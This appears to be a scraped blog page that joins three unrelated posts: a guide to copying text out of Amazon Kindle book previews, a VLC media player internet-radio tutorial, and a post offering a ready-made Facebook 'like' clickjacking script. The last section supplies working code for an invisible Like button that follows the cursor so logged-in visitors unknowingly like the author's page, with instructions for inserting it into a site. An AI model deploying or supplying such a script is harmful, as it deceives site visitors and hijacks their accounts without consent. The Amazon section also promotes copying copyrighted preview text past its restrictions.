-->

Are you sure you can copy text from "look inside" Amazon books?

I know there are people trying to copy text in Amazon books Look Inside! pages, but it cannot be done, right?


By default, you cannot copy the few preview pages of Look Inside! from Amazon books.

Sorry, my original tutorial below CANNOT WORK anymore! I have already deleted it away.

But here is the good news.... 

There are some books which have Kindle option can still be be copied!

 Remember, NOT for all titles.

How To Copy Amazon Look Inside Preview Pages

 Let me share with you how you can still copy out the text or words from Amazon Look Inside! 

Now it is even simpler to copy the preview content of Amazon Inside. No need any special software.

This is what you do:

1. After you have searched the book which you want in Amazon, click on the Kindle Booktab.


Note: Not ALL titles have Kindle Book option. And also NOT all books which have Kindle Book option can be copied.

2.  Put your cursor outside the main page, right click on it and then click "Select All".

3.  If it looks something like this as shown below, it means it can be copied.


4. Right click again and then click "Copy"

5. Paste the copied content onto the NotePad.

6. Now you can edit the text. You can either select out the content you want or delete away those unwanted text.

Note: When you use your cursor and "Select All" and get the outcome as shown below , then it means this particular book CANNOTbe copied

How To Copy Images And Text From Amazon Look

Tutorial

I have been using the free versatile media player program, VLC just to watch movies and listen to my favorite music CDs for a long time now.

Last Sunday afternoon I was fiddling around with its interface, and I accidentally discovered an interesting feature called Icecast Radio Directory.

Do you know you can free sotware to listen to lots of internet radio stations from all over the world?

For those of you who already installed VLC in your PC, you may like to try it out. 

How To Use Internet Radio Stations in VLC Media Player  

This is what you.

1. Click to open or launch your VLC media player.

2. Click on "View" on top of the interface.

3. Then click "Playlist".


4. Next look for "IceCast Radio Directory" on the left side of the interface, listed under "Internet".

5. Click on "Icecast Radio Directory".


6. Wait for a while, then a long list of internet radio stations will appear on the right side of the interface.

7. Don't be overwhelmed. I know there lots of radio stations in there!


8. You use the small search box on the top right hand corner, to help you to filter down the stations by genre name.

  9. For instance, if you like to enjoy country music, just type country into the box.

10. Automatically it will filter down the radio stations which play country music.

11. Now you pick your selection.  
  
12. To tune to the radio station, you can either double click on the name of radio station.

13. Or you can right click on the name of the radio station, and a small box will pop up.

14. Then you left click on the word, "Play". (see image below)


15. Instantly VLC will start playing music from your selected internet radio station.

Note: For those of you who still don't have this useful VLC media player installed in your PC, it's time you should.

It is a free and open source cross-platform multimedia player and framework,

Besides having internet radio stations, VLC can play most multimedia files as well as DVDs, audio CDs, VCDs, and various streaming functions.

To download and install VLC media player, click HERE.

l

How To Access Internet Radio Stations In VLC Media Player

© lifetrick 24
facebook likes click jacking
Today i am going to share a trick from which you can increase your face book fan page likes like hell fire. our todays topic is on how you can increase your Facebook likes by click jacking the users.

what is click jacking ?

According to OWASP 

Click jacking, also known as a "UI redress attack", is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is "hijacking" clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.

But in simple words click jacking is like guiding the blind peoples in wrong direction for your wealth.

Because in click jacking mostly peoples try to hijack facebook likes and what they do is first they make the like button of facebook transparent in such a way that it is available but because of its transparency peoples cant see it and after they use java script to move this like button over your mouse, mean where ever your mouse will move this button will move with your cursor on the web page.

And they use this complete script in their web pages and all those visitors which come to that page read the article and if they are logged in from their facebook account and if they click on the webpage the like will be made automatically to your page after they click.

Get Started 

I am going to give you ready made facebook likes click jacking script and you can use it only for testing.

Put the below script code above  </head> in your html/php page

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>
<script type="text/javascript">
function ClickJackFbHide(){
jQuery("div[id^=\'clickjack-button-wrapper\']").hide();
}
function ClickJackFbShow(){
jQuery("div[id^=\'clickjack-button-wrapper\']").show();
}
</script>


Now below is the main code so put it  before </body> in html/php

<div id="clickjack-button-wrapper-5" style="position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden">
<!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe src="http://www.facebook.com/plugins/like.php?href=Replace Your facebook fan pageurl&amp;layout=button_count&amp;show_faces=false&amp;
width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;" allowTransparency="true"></iframe>
</div>
<script type="text/javascript">
jQuery( document ).ready( function() {
$( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) {
jQuery( "#clickjack-button-wrapper-5" ).css( {
top: e.pageY - 10,
left: e.pageX + 30
} );
} );
clickjack_hider();
var clickjack_fb_timer = setTimeout("clickjack_hider()",5000);
} );
function clickjack_hider(){
jQuery("input").mouseout(function(){ClickJackFbShow();});
jQuery("a").mouseout(function(){ClickJackFbShow();});
jQuery("button").mouseout(function(){ClickJackFbShow();});
jQuery("textarea").mouseout(function(){ClickJackFbShow();});
jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();}); jQuery("object").mouseout(function(){ClickJackFbShow();});
jQuery("input").mouseover(function(){ClickJackFbHide();});
jQuery("a").mouseover(function(){ClickJackFbHide();});
jQuery("button").mouseover(function(){ClickJackFbHide();});
jQuery("textarea").mouseover(function(){ClickJackFbHide();});
jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();}); jQuery("object").mouseover(function(){ClickJackFbHide();});
}
</script>

Now you have to put your facebook fan page url in  the above script where it is written in RED " Replace Your Facebook Fan Page URL " with your fan page url.

Now check the script i am 100% sure this is working because i have tested it right now so first unlike your page and then check the script you will get the finger on the page which is a sign that script is working and like button is moving with your cursor in hidden mode.    Live Comments

how to increase facebook likes hack free trick facebook likes jacking free tutorial hacking 

Subscribe Our Newsletter